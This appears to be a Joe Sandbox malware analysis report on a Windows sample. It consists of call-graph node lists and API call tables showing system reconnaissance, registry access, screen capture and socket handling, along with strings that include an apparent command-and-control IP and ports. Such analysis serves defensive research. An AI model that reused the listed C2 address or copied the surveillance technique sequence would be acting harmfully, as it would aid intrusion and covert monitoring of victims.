73680 3087dfb 67 API calls _free 73662->73680 73665 3081004 73665->73662 73679 3081af9 77 API calls 4 library calls 
73665->73679 73668 307e4af 73667->73668 73669 307e489 73667->73669 73668->73608 73668->73610 73669->73668 73670 307e491 CreateThread WaitForSingleObject 73669->73670 73670->73668 73715 307df10 73670->73715 73671->73624 73672->73635 73673->73643 73674->73651 73675->73656 73676->73660 73677->73661 73678->73665 73679->73662 73680->73657 73681->73627 73682->73638 73683->73644 73684->73632 73685->73636 73687 3081091 73686->73687 73688 3083cb5 DecodePointer TlsSetValue 73686->73688 73689 3084534 73687->73689 73688->73687 73692 308453d 73689->73692 73690 308a6f2 __calloc_crt 65 API calls 73690->73692 73691 308109d 73691->73636 73691->73641 73692->73690 73692->73691 73693 308455b Sleep 73692->73693 73694 3084570 73693->73694 73694->73691 73694->73692 73696 3084300 ___BuildCatchObjectHelper 73695->73696 73697 3083d3a GetModuleHandleW 73696->73697 73698 3088e5b __lock 64 API calls 73697->73698 73699 3083d78 InterlockedIncrement 73698->73699 73700 3083dd0 __CRT_INIT@12 LeaveCriticalSection 73699->73700 73701 3083d92 73700->73701 73702 3088e5b __lock 64 API calls 73701->73702 73703 3083d99 73702->73703 73704 3084d46 ___addlocaleref 8 API calls 73703->73704 73705 3083db7 73704->73705 73706 3083dd9 __CRT_INIT@12 LeaveCriticalSection 73705->73706 73707 3083dc4 ___BuildCatchObjectHelper 73706->73707 73707->73655 73709 307f644 RtlFreeHeap 73708->73709 73713 307f66d __dosmaperr 73708->73713 73710 307f659 73709->73710 73709->73713 73711 307f91b __gmtime64_s 64 API calls 73710->73711 73712 307f65f GetLastError 73711->73712 73712->73713 73713->73636 73714->73636 73716 3080542 67 API calls 73715->73716 73717 307df5a Sleep 73716->73717 73718 307df97 73717->73718 73719 307df74 73717->73719 73720 307dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 73718->73720 73721 307df9f 73718->73721 73722 307f707 77 API calls 73719->73722 73724 307fa29 289 API calls 73720->73724 73723 3077620 14 API calls 73721->73723 73725 307df7b 73722->73725 73723->73720 73727 307e003 CloseHandle 73724->73727 
73726 307fa29 289 API calls 73725->73726 73728 307df8d CloseHandle 73726->73728 73729 307f707 77 API calls 73727->73729 73728->73718 73730 307e014 73729->73730 73731 307e022 73730->73731 73732 3072c90 8 API calls 73730->73732 73733 307f707 77 API calls 73731->73733 73732->73731 73734 307e036 73733->73734 73735 3079730 80 API calls 73734->73735 73740 307e04e 73734->73740 73735->73740 73736 307f876 66 API calls __NMSG_WRITE 73736->73740 73737 307e189 EnumWindows 73738 307e1a5 Sleep EnumWindows 73737->73738 73737->73740 73738->73738 73738->73740 73739 3080542 67 API calls 73739->73740 73740->73736 73740->73737 73740->73739 73741 307e1f0 Sleep 73740->73741 73742 307e239 CreateEventA 73740->73742 73758 3072da0 306 API calls 73740->73758 73741->73740 73743 307f876 __NMSG_WRITE 66 API calls 73742->73743 73748 307e281 73743->73748 73744 307ca70 113 API calls 73744->73748 73745 307e2bf Sleep RegOpenKeyExW 73746 307e2f5 RegQueryValueExW 73745->73746 73745->73748 73746->73748 73747 3075430 268 API calls 73747->73748 73748->73744 73748->73745 73748->73747 73752 307e339 73748->73752 73749 307e345 CloseHandle 73749->73740 73750 307fa29 289 API calls 73750->73752 73751 307e39f Sleep 73751->73752 73752->73749 73752->73750 73752->73751 73753 307e422 WaitForSingleObject CloseHandle 73752->73753 73754 3080542 67 API calls 73752->73754 73756 307e3dd Sleep CloseHandle 73752->73756 73757 307e3cd WaitForSingleObject CloseHandle 73752->73757 73753->73752 73755 307e43c Sleep CloseHandle 73754->73755 73755->73740 73756->73740 73757->73756 73758->73740 73760 2713366 73759->73760 73771 2711100 73760->73771 73762 27134e1 73762->73550 73763 27134c6 73764 27111b0 70 API calls 73763->73764 73765 27134d8 73764->73765 73765->73550 73766 2713378 _memmove 73766->73762 73766->73763 73767 2713403 timeGetTime 73766->73767 73769 27111b0 70 API calls 73766->73769 73788 27154c0 73766->73788 73779 27111b0 73767->73779 73769->73766 73772 2711111 73771->73772 73773 271110b 73771->73773 73820 2716ba0 
73772->73820 73773->73766 73775 2711134 VirtualAlloc 73776 271116f 73775->73776 73777 2711198 73776->73777 73778 271118a VirtualFree 73776->73778 73777->73766 73778->73777 73780 27111bd 73779->73780 73781 27111c6 73780->73781 73782 2716ba0 __floor_pentium4 68 API calls 73780->73782 73781->73766 73783 27111ee 73782->73783 73784 2711214 73783->73784 73785 271121b VirtualAlloc 73783->73785 73784->73766 73786 2711236 73785->73786 73787 2711247 VirtualFree 73786->73787 73787->73766 73789 27154dc 73788->73789 73813 271580d 73788->73813 73790 2715707 VirtualAlloc 73789->73790 73791 27154e7 RegOpenKeyExW 73789->73791 73794 2715745 73790->73794 73792 2715515 RegQueryValueExW 73791->73792 73793 27155ba 73791->73793 73795 271553a 73792->73795 73796 27155ad RegCloseKey 73792->73796 73801 27156f8 73793->73801 73802 27155f5 73793->73802 73798 27167ff 77 API calls 73794->73798 73797 27167ff 77 API calls 73795->73797 73796->73793 73799 2715540 _memset 73797->73799 73800 2715758 73798->73800 73804 271554d RegQueryValueExW 73799->73804 73800->73801 73805 2715788 RegCreateKeyW 73800->73805 73806 271721b 743 API calls 73801->73806 73803 27155fe VirtualFree 73802->73803 73814 2715611 _memset 73802->73814 73803->73814 73807 2715569 VirtualAlloc 73804->73807 73808 27155aa 73804->73808 73809 27157a3 RegDeleteValueW RegSetValueExW 73805->73809 73810 27157ca RegCloseKey 73805->73810 73811 27157f3 Sleep 73806->73811 73812 27155a5 73807->73812 73808->73796 73809->73810 73810->73801 73838 2712d10 73811->73838 73812->73808 73813->73766 73815 27167ff 77 API calls 73814->73815 73817 27156b1 73815->73817 73816 27156e6 ctype 73816->73766 73817->73816 73834 27160df 73817->73834 73821 2716bad 73820->73821 73824 2717d77 __ctrlfp __floor_pentium4 73820->73824 73822 2716bde 73821->73822 73821->73824 73829 2716c28 73822->73829 73831 2717a9b 67 API calls ___strgtold12_l 73822->73831 73823 2717de5 __floor_pentium4 73828 2717dd2 __ctrlfp 73823->73828 73833 271bc80 67 API calls 6 library calls 73823->73833 
73824->73823 73826 2717dc2 73824->73826 73824->73828 73832 271bc2b 66 API calls 3 library calls 73826->73832 73828->73775 73829->73775 73831->73829 73832->73828 73833->73828 73835 27160e5 73834->73835 73836 27111b0 70 API calls 73835->73836 73837 272fab1 GetCurrentThreadId 73836->73837 73839 2712d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 73838->73839 73840 2712d70 73838->73840 73839->73840 73840->73813 73841->73566 73842->73579 73843 272f927 73844 272fb9a 73843->73844 73848 27160df 71 API calls 73844->73848 73849 2715ef8 73844->73849 73853 272f997 73844->73853 73845 272fb9c 73848->73845 73850 2715f68 73849->73850 73851 2711100 70 API calls 73850->73851 73852 272f9b7 73850->73852 73851->73850 73854 2715f68 73853->73854 73855 2711100 70 API calls 73854->73855 73856 272f9b7 73854->73856 73855->73854 73857 2715e07 73858 272f0f9 RegQueryValueExW 73857->73858 73859 2713f35 __wcsrev 73858->73859 73860 40e4b8 73862 40e4c0 73860->73862 73861 40e50d 73862->73861 73865 40b968 73862->73865 73864 40e4fc LoadStringW 73864->73861 73866 40b995 73865->73866 73868 40b976 73865->73868 73866->73864 73868->73866 73870 40b920 73868->73870 73871 40b930 GetModuleFileNameW 73870->73871 73873 40b94c 73870->73873 73874 40cbac GetModuleFileNameW 73871->73874 73873->73864 73875 40cbfa 73874->73875 73880 40ca88 73875->73880 73877 40cc26 73878 40cc40 73877->73878 73879 40cc38 LoadLibraryExW 73877->73879 73878->73873 73879->73878 73881 40caa9 73880->73881 73882 40cb31 73881->73882 73898 40c7ac 73881->73898 73882->73877 73884 40cb1e 73885 40cb33 GetUserDefaultUILanguage 73884->73885 73886 40cb24 73884->73886 73904 40c15c EnterCriticalSection 73885->73904 73887 40c8d8 2 API calls 73886->73887 73887->73882 73889 40cb40 73924 40c8d8 73889->73924 73891 40cb4d 73892 40cb75 73891->73892 73893 40cb5b GetSystemDefaultUILanguage 73891->73893 73892->73882 73928 40c9bc 73892->73928 73895 40c15c 17 API calls 73893->73895 73896 40cb68 73895->73896 73897 40c8d8 2 API calls 73896->73897 
73897->73892 73899 40c7ce 73898->73899 73903 40c7e0 73898->73903 73936 40c490 73899->73936 73901 40c7d8 73957 40c810 18 API calls 73901->73957 73903->73884 73905 40c1a8 LeaveCriticalSection 73904->73905 73906 40c188 73904->73906 73959 408718 73905->73959 73908 40c199 LeaveCriticalSection 73906->73908 73918 40c24a 73908->73918 73909 40c1b9 IsValidLocale 73910 40c217 EnterCriticalSection 73909->73910 73911 40c1c8 73909->73911 73912 40c22f 73910->73912 73913 40c1d1 73911->73913 73914 40c1dc 73911->73914 73920 40c240 LeaveCriticalSection 73912->73920 73961 40c040 6 API calls 73913->73961 73962 40be44 IsValidLocale GetLocaleInfoW GetLocaleInfoW 73914->73962 73917 40c1e5 GetSystemDefaultUILanguage 73917->73910 73919 40c1ef 73917->73919 73918->73889 73921 40c200 GetSystemDefaultUILanguage 73919->73921 73920->73918 73963 40be44 IsValidLocale GetLocaleInfoW GetLocaleInfoW 73921->73963 73923 40c1da 73923->73910 73926 40c8f7 73924->73926 73925 40c983 73925->73891 73926->73925 73964 40c86c 73926->73964 73969 4087fc 73928->73969 73931 40ca0c 73932 40c86c 2 API calls 73931->73932 73933 40ca20 73932->73933 73934 40ca4e 73933->73934 73935 40c86c 2 API calls 73933->73935 73934->73882 73935->73934 73937 40c4a7 73936->73937 73938 40c4bb GetModuleFileNameW 73937->73938 73939 40c4d0 73937->73939 73938->73939 73940 40c4f8 RegOpenKeyExW 73939->73940 73947 40c69f 73939->73947 73941 40c5b9 73940->73941 73942 40c51f RegOpenKeyExW 73940->73942 73958 40c2a0 7 API calls 73941->73958 73942->73941 73943 40c53d RegOpenKeyExW 73942->73943 73943->73941 73945 40c55b RegOpenKeyExW 73943->73945 73945->73941 73948 40c579 RegOpenKeyExW 73945->73948 73946 40c5d7 RegQueryValueExW 73949 40c5f5 73946->73949 73950 40c628 RegQueryValueExW 73946->73950 73947->73901 73948->73941 73951 40c597 RegOpenKeyExW 73948->73951 73953 40c5fd RegQueryValueExW 73949->73953 73952 40c644 73950->73952 73955 40c626 73950->73955 73951->73941 73951->73947 73956 40c64c RegQueryValueExW 73952->73956 73953->73955 73954 40c68e 
RegCloseKey 73954->73901 73955->73954 73956->73955 73957->73903 73958->73946 73960 40871e 73959->73960 73960->73909 73961->73923 73962->73917 73963->73923 73965 40c881 73964->73965 73966 40c89e FindFirstFileW 73965->73966 73967 40c8b4 73966->73967 73968 40c8ae FindClose 73966->73968 73967->73926 73968->73967 73970 408800 GetUserDefaultUILanguage GetLocaleInfoW 73969->73970 73970->73931 73971 271638b 73972 2711100 70 API calls 73971->73972 73973 2716390 73972->73973 73974 271608a 73975 27160a0 RegOpenKeyExW 73974->73975 73976 2713f35 __wcsrev 73975->73976 73977 271474c lstrlenW 73978 272fff8 73977->73978 73979 26c0032 73990 26c0ae4 GetPEB 73979->73990 73982 26c0ae4 GetPEB 73983 26c02a7 73982->73983 73984 26c04a6 GetNativeSystemInfo 73983->73984 73988 26c0a02 73983->73988 73985 26c04d3 VirtualAlloc 73984->73985 73984->73988 73986 26c04ec VirtualAlloc 73985->73986 73987 26c04ff 73985->73987 73986->73987 73992 2717813 73987->73992 73991 26c029b 73990->73991 73991->73982 73993 2717823 73992->73993 73994 271781e 73992->73994 73998 271771d 73993->73998 74006 271b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 73994->74006 73997 2717831 73997->73988 73999 2717729 ___DllMainCRTStartup 73998->73999 74000 2717776 73999->74000 74001 27177c6 ___DllMainCRTStartup 73999->74001 74007 27175b9 73999->74007 74000->74001 74003 27177a6 74000->74003 74005 27175b9 __CRT_INIT@12 149 API calls 74000->74005 74001->73997 74003->74001 74004 27175b9 __CRT_INIT@12 149 API calls 74003->74004 74004->74001 74005->74003 74006->73993 74008 27175c5 ___DllMainCRTStartup 74007->74008 74009 2717647 74008->74009 74010 27175cd 74008->74010 74012 27176a8 74009->74012 74013 271764d 74009->74013 74059 271803b HeapCreate 74010->74059 74014 2717706 74012->74014 74015 27176ad 74012->74015 74019 271766b 74013->74019 74027 27175d6 ___DllMainCRTStartup 74013->74027 74069 2718306 66 API calls _doexit 74013->74069 74014->74027 74075 2719a58 79 API calls 
__freefls@4 74014->74075 74017 2719754 ___set_flsgetvalue 3 API calls 74015->74017 74016 27175d2 74018 27175dd 74016->74018 74016->74027 74022 27176b2 74017->74022 74060 2719ac6 86 API calls 4 library calls 74018->74060 74020 271767f 74019->74020 74070 271b0e4 67 API calls _free 74019->74070 74073 2717692 70 API calls __mtterm 74020->74073 74028 2719fe4 __calloc_crt 66 API calls 74022->74028 74027->74000 74032 27176be 74028->74032 74029 27175e2 __RTC_Initialize 74030 27175e6 74029->74030 74038 27175f2 GetCommandLineA 74029->74038 74061 2718059 HeapDestroy 74030->74061 74031 2717675 74071 27197a5 70 API calls _free 74031->74071 74032->74027 74035 27176ca DecodePointer 74032->74035 74039 27176df 74035->74039 74036 27175eb 74036->74027 74037 271767a 74072 2718059 HeapDestroy 74037->74072 74062 271b468 71 API calls 2 library calls 74038->74062 74042 27176e3 74039->74042 74043 27176fa 74039->74043 74045 27197e2 __CRT_INIT@12 66 API calls 74042->74045 74074 2716e49 66 API calls 2 library calls 74043->74074 74044 2717602 74063 271ae9f 73 API calls __calloc_crt 74044->74063 74048 27176ea GetCurrentThreadId 74045->74048 74048->74027 74049 271760c 74050 2717610 74049->74050 74065 271b3ad 95 API calls 3 library calls 74049->74065 74064 27197a5 70 API calls _free 74050->74064 74053 271761c 74054 2717630 74053->74054 74066 271b137 94 API calls 6 library calls 74053->74066 74054->74036 74068 271b0e4 67 API calls _free 74054->74068 74057 2717625 74057->74054 74067 2718119 77 API calls 4 library calls 74057->74067 74059->74016 74060->74029 74061->74036 74062->74044 74063->74049 74064->74030 74065->74053 74066->74057 74067->74054 74068->74050 74069->74019 74070->74031 74071->74037 74072->74020 74073->74027 74074->74027 74075->74027

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 18 3075430-30754b7 call 307f707 call 3086770 * 3 gethostname gethostbyname 27 30754bd-3075504 inet_ntoa call 30803cf * 2 18->27 28 307555c-307569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 3077490 GetSystemInfo wsprintfW call 3076c50 call 3076ee0 GetForegroundWindow 18->28 27->28 38 3075506-3075508 27->38 41 30756b2-30756c0 28->41 42 307569f-30756ac GetWindowTextW 28->42 40 3075510-307555a inet_ntoa call 30803cf * 2 38->40 40->28 44 30756c2 41->44 45 30756cc-30756f0 lstrlenW call 3076d70 41->45 42->41 44->45 51 3075702-3075726 call 307f876 45->51 52 30756f2-30756ff call 307f876 45->52 57 3075732-3075756 lstrlenW call 3076d70 51->57 58 3075728 51->58 52->51 61 3075768-30757b9 GetModuleHandleW GetProcAddress 57->61 62 3075758-3075765 call 307f876 57->62 58->57 64 30757c6-30757cd GetSystemInfo 61->64 65 30757bb-30757c4 GetNativeSystemInfo 61->65 62->61 67 30757d3-30757e1 64->67 65->67 68 30757e3-30757eb 67->68 69 30757ed-30757f2 67->69 68->69 70 30757f4 68->70 71 30757f9-3075820 wsprintfW call 3076a70 GetCurrentProcessId 69->71 70->71 74 3075885-307588c call 3076690 71->74 75 3075822-307583c OpenProcess 71->75 83 307589e-30758ab 74->83 84 307588e-307589c 74->84 75->74 76 307583e-3075853 K32GetProcessImageFileNameW 75->76 78 3075855-307585c 76->78 79 307585e-3075866 call 30780f0 76->79 81 307587f CloseHandle 78->81 85 307586b-307586d 79->85 81->74 86 30758ac-30759a1 call 307f876 call 3076490 call 3076150 call 307fc0e GetTickCount call 308043c call 30803a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 83->86 84->86 87 307586f-3075876 85->87 88 3075878-307587e 85->88 101 30759a3-30759c8 86->101 102 30759ca-30759e9 86->102 87->81 88->81 103 30759ea-3075a14 call 3075a30 call 3073160 call 307efff 101->103 102->103 108 3075a19-3075a2e call 307f00a 103->108
                                                                                    APIs
                                                                                      • Part of subcall function 0307F707: _malloc.LIBCMT ref: 0307F721
                                                                                    • _memset.LIBCMT ref: 0307546C
                                                                                    • _memset.LIBCMT ref: 03075485
                                                                                    • _memset.LIBCMT ref: 03075495
                                                                                    • gethostname.WS2_32(?,00000032), ref: 030754A3
                                                                                    • gethostbyname.WS2_32(?), ref: 030754AD
                                                                                    • inet_ntoa.WS2_32 ref: 030754C5
                                                                                    • _strcat_s.LIBCMT ref: 030754D8
                                                                                    • _strcat_s.LIBCMT ref: 030754F1
                                                                                    • inet_ntoa.WS2_32 ref: 0307551A
                                                                                    • _strcat_s.LIBCMT ref: 0307552D
                                                                                    • _strcat_s.LIBCMT ref: 03075546
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03075573
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03075587
                                                                                    • GetLastInputInfo.USER32(?), ref: 0307559A
                                                                                    • GetTickCount.KERNEL32 ref: 030755A0
                                                                                    • wsprintfW.USER32 ref: 030755D5
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 030755E8
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 030755FC
                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03075653
                                                                                    • wsprintfW.USER32 ref: 0307566C
                                                                                    • GetForegroundWindow.USER32 ref: 03075695
                                                                                    • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 030756AC
                                                                                    • lstrlenW.KERNEL32(000008CC), ref: 030756D3
                                                                                    • lstrlenW.KERNEL32(00000994), ref: 03075739
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 030757AA
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 030757B1
                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 030757C2
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 030757CD
                                                                                    • wsprintfW.USER32 ref: 03075806
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 03075818
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0307582E
                                                                                    • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0307584B
                                                                                    • CloseHandle.KERNEL32(03095164), ref: 0307587F
                                                                                    • GetTickCount.KERNEL32 ref: 030758E9
                                                                                    • __time64.LIBCMT ref: 030758F8
                                                                                    • __localtime64.LIBCMT ref: 0307592F
                                                                                    • wsprintfW.USER32 ref: 03075968
                                                                                    • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0307597D
                                                                                    • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0307598C
                                                                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 03075999
                                                                                      • Part of subcall function 030780F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03078132
                                                                                      • Part of subcall function 030780F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03078166
                                                                                      • Part of subcall function 030780F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03078176
                                                                                      • Part of subcall function 030780F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 030781A6
                                                                                      • Part of subcall function 030780F0: lstrlenW.KERNEL32(?), ref: 030781B7
                                                                                      • Part of subcall function 030780F0: __wcsnicmp.LIBCMT ref: 030781CE
                                                                                      • Part of subcall function 030780F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03078204
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                    • String ID: %d min$1.0$2024.12.25$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                    • API String ID: 1101047656-4125556267
                                                                                    • Opcode ID: 652b7bdb181bed7d872046d9ca5c6d8ea17fc3009991f41d0abf9d838b95b5e0
                                                                                    • Instruction ID: 3fb3cfb9101157a24a722d6bacb8bd11023b11e1c24f115a1fc988c5680ffd27
                                                                                    • Opcode Fuzzy Hash: 652b7bdb181bed7d872046d9ca5c6d8ea17fc3009991f41d0abf9d838b95b5e0
                                                                                    • Instruction Fuzzy Hash: 11F1C7B5942308BFDB24EB64CC45FDB73BCBF88700F004959E61AAB181EA74A645CF59
                                                                                    APIs
                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 026C04AE
                                                                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 026C04DE
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 026C04F5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133872935.00000000026C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_26c0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual$InfoNativeSystem
                                                                                    • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                    • API String ID: 4117132724-2899676511
                                                                                    • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction ID: 0c9ad89cc95d860cf8c6a412b6b7e861e272f514667ba0a5d02e17964a2f73de
                                                                                    • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction Fuzzy Hash: 71627731508385CFD724DF64C840BABBBE4EF94704F24492EE9C99B252E7709989CB96
                                                                                    APIs
                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 00D904AE
                                                                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00D904DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d90000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocInfoNativeSystemVirtual
                                                                                    • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                    • API String ID: 2032221330-2899676511
                                                                                    • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction ID: 63016dfa7abe4ad6d696b787901e04ac914e03cecb696f51cfac4f10861be449
                                                                                    • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction Fuzzy Hash: 60628C715083858FDB20CF24D840BABBBE5FF94714F18492DE9C99B251E770D988CBA6

                                                                                    Control-flow Graph (graph image not rendered; function starting at 0307DF10, nodes marked Executed / Not Executed)
                                                                                    APIs
                                                                                      • Part of subcall function 03080542: __fassign.LIBCMT ref: 03080538
                                                                                    • Sleep.KERNEL32(00000000), ref: 0307DF64
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0307DF91
                                                                                    • GetLocalTime.KERNEL32(?), ref: 0307DFA9
                                                                                    • wsprintfW.USER32 ref: 0307DFE0
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(030775B0), ref: 0307DFEE
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0307E007
                                                                                      • Part of subcall function 0307F707: _malloc.LIBCMT ref: 0307F721
                                                                                    • EnumWindows.USER32(03075CC0,?), ref: 0307E19D
                                                                                    • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0307E1AA
                                                                                    • EnumWindows.USER32(03075CC0,?), ref: 0307E1BE
                                                                                    • Sleep.KERNEL32(00000BB8), ref: 0307E1F5
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0307E241
                                                                                    • Sleep.KERNEL32(00000FA0), ref: 0307E2C4
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0307E2EB
                                                                                    • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0307E30B
                                                                                    • CloseHandle.KERNEL32(?), ref: 0307E35D
                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 0307E3A4
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0307E3D0
                                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 0307E3D7
                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 0307E3E2
                                                                                    • CloseHandle.KERNEL32(?), ref: 0307E400
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0307E425
                                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 0307E42C
                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 0307E446
                                                                                    • CloseHandle.KERNEL32(?), ref: 0307E464
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                    • String ID: %4d.%2d.%2d-%2d:%2d:%2d$15091$15091$15092$15093$154.82.85.107$154.82.85.107$154.82.85.107$154.82.85.107$Console$IpDatespecial
                                                                                    • API String ID: 1511462596-2950227363
                                                                                    • Opcode ID: 3c1abfa334580cdf03d01b17a9f95bf479593422920347d4faf14016d77222eb
                                                                                    • Instruction ID: d710dc6f772faddf3bf82e3ab8ab38e08bbad7262ea98696d0cdfb1e15e28c49
                                                                                    • Opcode Fuzzy Hash: 3c1abfa334580cdf03d01b17a9f95bf479593422920347d4faf14016d77222eb
                                                                                    • Instruction Fuzzy Hash: 3CD113B094B701BFD320EF64EC85E6EB7E8BBC4700F004A1EF1558A285DB759855CB6A

                                                                                    Control-flow Graph (graph image not rendered)

                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 0307BC8F
                                                                                    • GetDC.USER32 ref: 0307BC9C
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0307BCA2
                                                                                    • GetDC.USER32 ref: 0307BCAD
                                                                                    • GetDeviceCaps.GDI32 ref: 0307BCBA
                                                                                    • GetDeviceCaps.GDI32 ref: 0307BCC2
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0307BCD3
                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 0307BCF8
                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 0307BD26
                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 0307BD78
                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 0307BD8D
                                                                                    • CreateCompatibleBitmap.GDI32 ref: 0307BDA6
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0307BDB4
                                                                                    • SetStretchBltMode.GDI32 ref: 0307BDC0
                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 0307BDCD
                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 0307BDE0
                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0307BE07
                                                                                    • _memset.LIBCMT ref: 0307BE7A
                                                                                    • GetDIBits.GDI32 ref: 0307BE97
                                                                                    • _memset.LIBCMT ref: 0307BEAF
                                                                                      • Part of subcall function 0307F707: _malloc.LIBCMT ref: 0307F721
                                                                                    • DeleteObject.GDI32 ref: 0307BF23
                                                                                    • DeleteObject.GDI32 ref: 0307BF2D
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0307BF39
                                                                                    • DeleteObject.GDI32 ref: 0307BFDF
